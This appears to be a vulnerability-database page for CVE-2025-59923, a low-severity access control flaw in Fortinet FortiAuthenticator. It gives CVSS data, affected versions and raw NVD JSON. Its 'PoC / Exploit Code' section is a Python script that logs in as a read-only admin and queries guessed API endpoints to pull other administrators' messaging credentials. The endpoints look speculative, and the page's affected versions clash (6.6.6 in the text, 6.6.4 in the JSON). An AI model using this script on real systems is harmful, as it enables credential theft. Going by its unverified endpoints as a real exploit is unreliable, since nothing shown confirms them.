Security Vulnerability Report
中文
CVE-2025-59923 CVSS 2.7 LOW

CVE-2025-59923

Published: 2025-12-09 18:15:56
Last Modified: 2025-12-11 17:15:56
Source: [email protected]

Description

An improper access control vulnerability in Fortinet FortiAuthenticator 6.6.0 through 6.6.6, FortiAuthenticator 6.5 all versions, FortiAuthenticator 6.4 all versions, FortiAuthenticator 6.3 all versions may allow an authenticated attacker with at least read-only admin permission to obtain the credentials of other administrators' messaging services via crafted requests.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiauthenticator:*:*:*:*:*:*:*:* - VULNERABLE
FortiAuthenticator 6.3 所有版本
FortiAuthenticator 6.4 所有版本
FortiAuthenticator 6.5 所有版本
FortiAuthenticator 6.6.0 - 6.6.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59923 PoC - FortiAuthenticator Access Control Bypass # Requires authenticated session with read-only admin privileges import requests import json TARGET = "https://target-fortiauthenticator.example.com" USERNAME = "readonly_admin" PASSWORD = "password" def login(): """Authenticate and obtain session cookie""" session = requests.Session() login_url = f"{TARGET}/login" data = {"username": USERNAME, "password": PASSWORD} response = session.post(login_url, data=data, verify=False) return session if response.status_code == 200 else None def exploit(session): """Attempt to retrieve other admin messaging credentials""" # Enumerate messaging service endpoints endpoints = [ f"{TARGET}/api/v1/messaging/services", f"{TARGET}/api/v1/admin/messaging", f"{TARGET}/api/v1/settings/messaging" ] results = [] for endpoint in endpoints: response = session.get(endpoint, verify=False) if response.status_code == 200: data = response.json() results.append({"endpoint": endpoint, "data": data}) return results if __name__ == "__main__": session = login() if session: print("Login successful, attempting exploitation...") creds = exploit(session) print(json.dumps(creds, indent=2)) else: print("Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59923", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:15:55.663", "lastModified": "2025-12-11T17:15:56.497", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper access control vulnerability in Fortinet FortiAuthenticator 6.6.0 through 6.6.6, FortiAuthenticator 6.5 all versions, FortiAuthenticator 6.4 all versions, FortiAuthenticator 6.3 all versions may allow an authenticated attacker with at least read-only admin permission to obtain the credentials of other administrators' messaging services via crafted requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiauthenticator:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3.0", "versionEndIncluding": "6.6.4", "matchCriteriaId": "AC1A8077-94C7-4F49-B819-5A19492C7509"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-616", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.